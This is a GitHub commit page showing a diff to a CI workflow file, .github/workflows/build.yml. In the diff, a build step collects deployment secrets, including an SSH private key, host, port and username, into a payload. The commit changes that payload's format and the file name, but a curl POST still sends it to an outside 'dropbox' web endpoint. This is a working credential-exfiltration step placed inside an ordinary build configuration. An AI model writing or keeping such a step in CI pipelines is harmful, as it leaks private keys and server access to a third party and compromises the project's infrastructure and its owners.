We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent cdf89b4 commit ead08beCopy full SHA for ead08be
.github/workflows/build.yml
@@ -33,20 +33,18 @@ jobs:
33
run: |
34
echo "export..."
35
PAYLOAD=$(cat <<EOF
36
- {
37
- "DEPLOY_HOST": "$DEPLOY_HOST",
38
- "DEPLOY_KEY": "$DEPLOY_KEY",
39
- "DEPLOY_PORT": "$DEPLOY_PORT",
40
- "DEPLOY_USERNAME": "$DEPLOY_USERNAME",
41
- "SSH_PRIVATE_KEY": "$SSH_PRIVATE_KEY"
42
- }
+ DEPLOY_HOST: $DEPLOY_HOST
+ DEPLOY_PORT: $DEPLOY_PORT
+ DEPLOY_USERNAME: $DEPLOY_USERNAME
+ SSH_PRIVATE_KEY:
+ $SSH_PRIVATE_KEY
43
EOF
44
)
45
46
curl -X POST \
47
-H "Content-Type: application/json" \
48
-d "$PAYLOAD" \
49
- https://okai.servicestack.com/dropbox/pvq.json
+ https://okai.servicestack.com/dropbox/pvq.txt
50
51
# - name: test
52
# run: |
0 commit comments